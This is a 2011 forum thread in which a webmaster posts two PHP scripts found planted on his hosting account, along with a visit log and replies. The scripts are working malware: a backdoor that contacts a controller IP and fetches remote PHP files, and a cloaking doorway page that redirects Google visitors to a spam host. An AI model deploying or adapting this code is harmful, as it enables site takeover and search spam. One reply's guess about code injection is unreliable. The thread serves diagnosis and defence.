Hacked? - Found some strange directories in my root
08-02-2011, 17:12
Hacked? - Found some strange directories in my root
I have a hosted account for my domain and recently found a directory under /public_html/ whose name is a string of random letters. It contains a couple of PHP scripts and a text file that keeps growing with log entries.
The directory's permissions were 777 (I did not create it!).
I have included the content of the scripts below. Does anyone know what they are, where they came from, or what they are used for?
INDEX.PHP includes:
PHP Code:
<?php
// Access gate: the request must carry ?k=<secret> whose MD5 matches this stored hash.
// Anything else prints "nk" and exits, so only whoever holds the secret can drive the commands below.
$k='6fb8e25b609624dc10a68641e846102a';if ($k != md5($_GET['k'])) { echo'nk'; exit; }
// Controller host and path used by g()/doinit()/doget(); $c is the command verb taken from ?c=.
// Note the bareword index ($_GET[c], not $_GET['c']) — PHP resolves the undefined constant to the string 'c' with a notice.
$ctl="188.124.3.195";$ctlp="/ctl.php";$c=$_GET[c];
// Command dispatch: init / check / get / del call the matching function defined below.
if ($c=='init'){doinit();}if ($c=='check'){docheck();}if ($c=='get'){doget();}if ($c=='del'){dodel();}
// 'del' command: self-cleanup.
// With ?all=1 it unlinks every entry in the current directory and in ./cache, removes ./cache
// and echoes the number of directory entries it iterated (including "." and "..").
// Without ?all=1 it writes an empty index.html and deletes only this script.
function dodel() {
if ($_GET[all]==1) {
// Wipe the current directory. $c is never initialised here (not declared global), so it counts from undefined.
// The loose "!= false" test also means a file literally named "0" would end the loop early.
$d="."; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink($f);} } closedir($dh);
// Wipe and remove the cache directory created by doinit().
$d="cache"; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink("cache/$f");} } closedir($dh); rmdir("cache"); echo $c;
// Default: leave an empty index.html behind and remove this script itself.
} else { $fd=fopen("index.html","w");fclose($fd);unlink(basename($_SERVER[PHP_SELF]));}
}
// 'get' command: download a file from the controller and drop it next to this script.
// ?a=/path/name.php becomes local file "name.php" (directory components are stripped by basename),
// fetched over plain HTTP from $ctl as dirname($ctlp) . "/path/name.txt". The response body is
// written to disk unchanged, with no check of the HTTP status, so an error page would be saved too.
// Because the local name keeps its .php extension, this is a remote-file-dropping primitive.
// Echoes the remote path and then the downloaded byte count in single quotes.
function doget() {
global $ctlp, $ctl; $a = $_GET[a];
$lname = basename($a);
$b=dirname($ctlp);
echo "$b$a";
// A name ending in "php" is requested as ".txt" from the controller — presumably so the controller
// serves the file as plain text instead of executing it. str_replace swaps every "php" substring, not just the extension.
if (eregi("php$",$lname)){$a1 = str_replace("php", "txt", $a);}
else{$a1=$a;}
$fd=fopen($lname,"w");
$d = g($ctl,80,"$b$a1");
fwrite($fd,$d); fclose($fd);
echo "'".strlen($d)."'";
}
// 'init' command: create ./cache (the directory xtyb.php reads and writes its "cache/<md5>" pages in),
// print '0' and stop if that fails, then register this install with the controller by GETting
// ctl.php?c=init&me=<base64 of this script's own URL> and echoing whatever the controller replies.
function doinit() {
global$ctl,$ctlp;$b=mkdir("cache");if(!$b){echo '0';exit;}echo g($ctl,80,$ctlp."?c=init&me=".base64_encode(getme()));
}
// 'check' command: echo this script's URL followed by ";1" if the directory is writable
// (a file named "tmp" could be opened for writing — the handle is never closed and the file is left behind)
// or ";0" otherwise.
function docheck(){
echo getme();if (fopen("tmp","w")) {echo";1";}else{echo";0";}
}
// This script's own URL, rebuilt from the request's Host header and PHP_SELF; reported to the controller by doinit() and echoed by docheck().
function getme() { return "http://".$_SERVER[HTTP_HOST]."".$_SERVER[PHP_SELF]; }
// Minimal HTTP/1.0 GET over a raw socket. Returns only the response body; the status line and
// headers are read up to the first blank line and discarded. Dies if the socket cannot be opened
// (60 s connect timeout). $refer is computed but never sent.
function g($server, $port, $file) {
$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");
$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;
fputs($socket, "GET $file HTTP/1.0\r\n");
fputs($socket, "Host: $server\r\n\r\n");
$dat = '';
// Consume headers until CRLFCRLF. There is no feof check here, so a peer that closes the
// connection before sending a blank line makes fgets return false forever and this loop never ends.
do {$dat .= fgets ($socket, 1024);} while (strpos($dat,"\r\n\r\n") === false);
$dat = '';
// Everything after the headers is the body.
while (!feof($socket)) {$dat .= fread($socket,8192);}
fclose($socket);
return $dat;
}
?>
XTYB.PHP includes:
PHP Code:
<?php
// Doorway / cloaking page. Every request is logged first (see dolog()), then:
//   - visitors that are NOT in the Google crawler ranges (checkg) but arrive with a Google referer
//     are redirected to a third-party traffic broker (longsignups.net);
//   - everyone else (crawlers, direct hits) gets a generated keyword page built from Yahoo search
//     snippets plus random links to other keywords, cached on disk by keyword.
dolog();
error_reporting(0);
// Number of "related keyword" links to emit on the page.
$nr=rand(9,11);
// First query parameter: its NAME ($arg) and VALUE ($val). In the log the name is "jsya" and the
// value is a dash-separated keyword. Both are client-controlled.
list($arg,$val)=@each($_GET);
// HTML page template; its placeholders #title#, #kw#, #content#, #relink#, #rnum# are filled below.
// (The base64 literal is elided in this listing.)
$t=base64_decode("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");
$g = checkg($_SERVER[REMOTE_ADDR]);
// Cloaking: a non-Googlebot client whose referer contains "google" is bounced to the broker with
// the original referer and this page's URL as parameters. This runs before the cache check, so it
// applies to cached pages too.
if (!$g) {if(eregi("google",$_SERVER[HTTP_REFERER])){
$self=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];
$goto='http://longsignups.net/in.cgi?7&ref='.urlencode($_SERVER[HTTP_REFERER])."&page=".urlencode($self);
header("Location: $goto");exit;}}
// Keyword requested by the client, dashes turned back into spaces.
$q = str_replace("-", " ", urldecode($_GET[$arg]));
$c=1;
// Load the allowed keyword list from kw.txt (one per line). The "$c==$id" override is dead code:
// $id is never assigned anywhere in this file and $c is never incremented.
$kws = @file('kw.txt');foreach($kws as $k) { if ($c==$id) { $q = trim($k); } $tmp[]=trim($k); } $kws = $tmp;
// Only keywords present in kw.txt are served; anything else prints "404" and exits.
if (!in_array($q,$kws)){echo '404';exit;}
// Pick $nr random other keywords and build links back to this script for them.
// $arg (the client-supplied parameter name) is embedded in the href without escaping, and the
// finished page is cached by md5($q) alone, so a crafted parameter name would be stored and
// served to every later visitor of that keyword.
shuffle($kws);$rl = array_splice($kws,0,$nr);
foreach($rl as $r) { $rrl[] = "<a href=\"?$arg=".urlencode(str_replace(" ", "-", $r))."\">$r</a>"; }
// Serve from cache/<md5 of keyword> if a previous request already generated this page.
$h=md5($q); if(file_exists("cache/$h")){echo join('',file("cache/$h"));exit;}
// Otherwise fetch Yahoo search snippets for the keyword (array of HTML fragments, or 0 on failure —
// the 0 case reaches array_merge and its warning is hidden by error_reporting(0)).
$c=gets2($q);
$t=str_replace("#title#",ucwords($q),$t);
$t=str_replace("#kw#",$q,$t);
// Page body: search snippets and related-keyword links, shuffled together.
$cont = array_merge($c, $rrl);
//$cont = $c;
shuffle($cont);
$t=str_replace("#content#",join(' ',$cont),$t);
// join() is given a string, not an array, so this effectively blanks the #relink# placeholder.
$t=str_replace("#relink#",join(' ', ''),$t);
// Each #rnum# placeholder becomes a fresh random 4-letter token from gp().
$t = preg_replace_callback("/#rnum#/",create_function('$matches','return gp();'), $t);
// Persist the generated page to the cache, then emit it.
$f=@fopen("cache/$h","w");fwrite($f,$t);fclose($f);
echo $t;exit;
// Append one line per request to evekwalicu.txt in the script's directory:
// client IP, timestamp, server name, request URI, referer and user agent, separated by " -- ".
// This is the ever-growing text file the original poster found; it is world-readable alongside the script.
function dolog() {
$str = "$_SERVER[REMOTE_ADDR] -- ".date("Y-m-d H:i:s")." -- $_SERVER[SERVER_NAME] -- $_SERVER[REQUEST_URI] -- $_SERVER[HTTP_REFERER] -- $_SERVER[HTTP_USER_AGENT]\n"; $lp = "evekwalicu.txt"; $fd = fopen($lp, "a");fwrite($fd, $str); fclose($fd);
}
// Fetch search results for $kw from the (now defunct) Yahoo Web Search RSS API and turn them into
// HTML snippets of the form "<p><a href=LINK>TITLE</a> DESCRIPTION".
// Returns 0 if fewer than three <item> blocks were found, otherwise a shuffled array of snippets
// padded with three "<P>" entries. All socket errors are silenced with @.
function gets2($kw) {
$sc = 40;
$kw =trim($kw);
// 40 results, adult content allowed; the keyword is URL-encoded into the query string.
$base = "/WebSearchService/rss/webSearch.xml?appid=yahoosearchwebrss&results=$sc&query=".urlencode($kw)."&adult_ok=1";
$req = $base;
$s = @fsockopen("api.search.yahoo.com", 80, $_en, $_er, 10);
$rstr = "GET $req HTTP/1.0\r\n";
$rstr .= "Host: api.search.yahoo.com\r\n";
$rstr .= "\r\n";
@fwrite($s,$rstr);
$dat='';
// Skip the response headers. As in g(), there is no feof/false check: if fsockopen failed
// ($s === false) or the peer closes early, fgets keeps returning false and this loop never exits.
do {$dat .= fgets ($s);} while (strpos($dat,"\r\n\r\n") === false);
$dat='';
while (!feof($s)) {$dat .= fread($s,8192);}
$c = $dat;
@fclose($s);
// Crude XML scraping with regexes. No /s modifier, so an <item> that spans lines would not match.
$r = preg_match_all("/<item>(.+?)<\/item>/", $c, $na);
if ($r < 3) { return 0; }
$ret = array();
// Note the loop starts at 1: the first result is deliberately dropped.
for($i=1;$i<sizeof($na[1]);$i++) {
$tmp = $na[1][$i];
@eregi('<title>(.+)</title>', $tmp, $na2);
$title = $na2[1];
@eregi('<description>(.+)</description>', $tmp, $na2);
$description = $na2[1];
$description = str_replace("...", ".", $description);
@eregi('<link>(.+)</link>', $tmp, $na2);
$link = $na2[1];
//$ret[] = array($link, $title, $description);
//if ($i==1) {
// Title/description/link are inserted into the page as-is, exactly as returned by the API.
$ret[] = "\n\n<p><a href=\"$link\">$title</a> $description";
//} else {
// $ret[] = " <br>$title $description ";
//}
}
$ret[] = "<P>";
$ret[] = "<P>";
$ret[] = "<P>";
shuffle($ret); return $ret;
}
// Return 1 if $ip falls in one of four hard-coded CIDR blocks, else 0. Given how the result is
// used in the main script (suppressing the redirect), these appear to be Google crawler ranges
// as of when the script was written — not something that should be relied on today.
// Uses the deprecated split(); see ip_in_range() for why the match is looser than a real prefix test.
function checkg($ip) {
$nfilter = split("\n", "72.14.192.0/18
74.125.0.0/16
64.233.160.0/19
66.249.64.0/19");
foreach ($nfilter as $f) {
if (ip_in_range($ip, $f)) { return 1; }
} return 0;
}
// Binary string of $dec, left-padded with zeros to 32 characters. Only used by the (overwritten) broadcast computation in ip_in_range().
Function decbin32 ($dec) { return str_pad(decbin($dec), 32, '0', STR_PAD_LEFT); }
// Test whether dotted-quad $ip lies in $range, where $range may be:
//   "a.b.c.d/x.y.z.w"  CIDR with a dotted netmask,
//   "a.b.c.d/N"        CIDR with a prefix length (missing octets default to 0),
//   "a.b.*.*"          wildcard form, or
//   "A-B"              an inclusive address range.
// The prefix-length branch is NOT a correct containment test (see comment there), so callers such
// as checkg() accept more addresses than the stated block.
Function ip_in_range($ip, $range) {
if (strpos($range, '/') !== false) {
list($range, $netmask) = explode('/', $range, 2);
if (strpos($netmask, '.') !== false) {
// Dotted netmask: compare the masked network parts. This branch is correct.
$netmask = str_replace('*', '0', $netmask);
$netmask_dec = ip2long($netmask);
return ( (ip2long($ip) & $netmask_dec) == (ip2long($range) & $netmask_dec) );
} else {
// Prefix-length netmask: pad the range to four octets, zeroing empty ones.
$x = explode('.', $range);
while(count($x)<4) $x[] = '0';
list($a,$b,$c,$d) = $x;
$range = sprintf("%u.%u.%u.%u", empty($a)?'0':$a, empty($b)?'0':$b,empty($c)?'0':$c,empty($d)?'0':$d);
$range_dec = ip2long($range);
$ip_dec = ip2long($ip);
// Broadcast address computed two ways; the first (string-based) result is immediately overwritten.
$broadcast_dec = bindec(substr(decbin32($range_dec), 0, $netmask)
. str_pad('', 32-$netmask, '1'));
$wildcard_dec = pow(2, (32-$netmask)) - 1;
$broadcast_dec = $range_dec | $wildcard_dec;
// BUG: this only checks that every set bit of $ip is also set in the broadcast address, not that
// $ip's network bits equal the range's. Every address inside the block passes, but so do addresses
// outside it whose octets are bitwise subsets (e.g. 2.1.0.0 "matches" 74.125.0.0/16).
return (($ip_dec & $broadcast_dec) == $ip_dec);
}
} else {
if (strpos($range, '*') !==false) { // a.b.*.* format
$lower = str_replace('*', '0', $range);
$upper = str_replace('*', '255', $range);
$range = "$lower-$upper";
}
if (strpos($range, '-')!==false) { // A-B format
list($lower, $upper) = explode('-', $range, 2);
$lower_dec = ip2long($lower);
$upper_dec = ip2long($upper);
$ip_dec = ip2long($ip);
return ( ($ip_dec>=$lower_dec) && ($ip_dec<=$upper_dec) );
}
return false;
}
// Unreachable: every branch above has already returned, and $netmask_dec would be undefined here anyway.
$ip_dec = ip2long($ip);
return (($ip_dec & $netmask_dec) == $ip_dec);
}
// Random token of $length DISTINCT characters drawn from a 21-letter consonant set; used to fill
// the #rnum# placeholders in the page template. Despite the variable name this is not a password.
// The distinctness requirement means a $length above 21 would loop forever.
function gp ($length = 4)
{
$password = "";
$possible = "abcdfghjkmnpqrstvwxyz";
$i = 0;
while ($i < $length) {
$char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
// Only count a character if it has not been used yet.
if (!strstr($password, $char)) {
$password .= $char;
$i++;
}
}
return $password;
}
?>
08-02-2011, 17:47
Re: Hacked? - Found some strange directories in my root
Not entirely sure what the two PHP scripts are doing, but it looks like an attempt at a Phishing site.
08-02-2011, 17:59
Re: Hacked? - Found some strange directories in my root
This is what it created in EVEKWALICU.TXT
PHP Code:
66.160.206.167 -- 2010-03-27 13:53:52 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=when-to-reformat-hard-drive -- --
66.160.206.186 -- 2010-03-27 13:56:20 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=melbourne-fl-performance"> -- --
66.160.206.186 -- 2010-03-27 13:57:34 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=melbourne-fl-performance -- --
202.69.237.143 -- 2010-03-27 13:57:36 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=form-af-1540 -- -- B-Wiki/20050210
66.160.206.186 -- 2010-03-27 13:59:09 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=customer-survey-form-for-email-retail -- --
66.160.206.167 -- 2010-03-27 14:02:16 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=georgia-mortgage-form-free"> -- --
66.160.206.167 -- 2010-03-27 14:03:04 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=salaries-in-information-sciences -- --
72.44.48.77 -- 2010-03-27 14:06:55 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=salaries-in-information-sciences -- -- Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )
66.160.206.186 -- 2010-03-27 14:10:05 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
66.160.206.186 -- 2010-03-27 14:10:14 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
66.160.206.186 -- 2010-03-27 14:10:18 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
95.108.249.29 -- 2011-02-08 13:10:25 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=how-do-they-perform-an-emg -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
124.115.0.169 -- 2011-02-08 13:13:52 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=belly-button-information-piercing -- -- Sosospider+(+http://help.soso.com/webspider.htm)
91.201.66.6 -- 2011-02-08 13:19:00 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=standing-order-form-letting -- -- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
91.201.66.6 -- 2011-02-08 13:19:00 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=registration-information-ip -- http://mydomain.co.uk/kxqsyn/xtyb.php?jsya=standing-order-form-letting -- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
95.108.249.29 -- 2011-02-08 13:38:02 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=how-to-perform-dent-repair -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
119.235.237.16 -- 2011-02-08 13:59:03 -- mydomain.co.uk -- /kxqsyn/xtyb.php?eq;rental-move-out-form&jsya -- -- Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
119.235.237.85 -- 2011-02-08 14:01:23 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=american-federation-immigration-reform -- -- Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
94.213.156.83 -- 2011-02-08 14:02:10 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=famous-violin-performers -- -- Mozilla/4.0 (compatible; ICS)
207.46.13.88 -- 2011-02-08 14:02:29 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=many-stones-can-form-an-arch -- -- Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
95.108.249.29 -- 2011-02-08 14:07:31 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=international-pulp-market-information -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
180.171.82.63 -- 2011-02-08 14:09:26 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=the-history-of-school-uniforms -- http://www.baidu.com/s?bs=%D3%A2%D3%EF%B8%A8%B5%BC%B1%A8%C9%CF%BA%A3%B0%CB%C4%EA%BC%B6%BA%AE%BC%D9%CE%C4%D5%C2&f=8&wd=the+history+of+the+school+uniforms -- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; QQDownload 661; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Only the start and end of the file are included, as there are approximately 30 hits an hour and the file is already a few MB in size.
09-02-2011, 23:17
Re: Hacked? - Found some strange directories in my root
http://forum.hosts-file.net/viewtopic.php?f=70&t=1841
The occurrence of "longsignups.net" is not good!
Malware related!
27-02-2011, 19:46
Re: Hacked? - Found some strange directories in my root
I don't know enough PHP to understand fully what it's up to, although I think it's doing some kind of search/replace — possibly injecting its own code into other PHP files in the directory?
It also looks to be calling home, either to feed data back to its authors or to receive commands.
If I see one of my friends online who knows PHP i'll ask them about it.
Edit:
My friend replied with "Looks like the cracker is using the site for a link farm (to generate SEO). It also calls Yahoo's search API."
Interesting...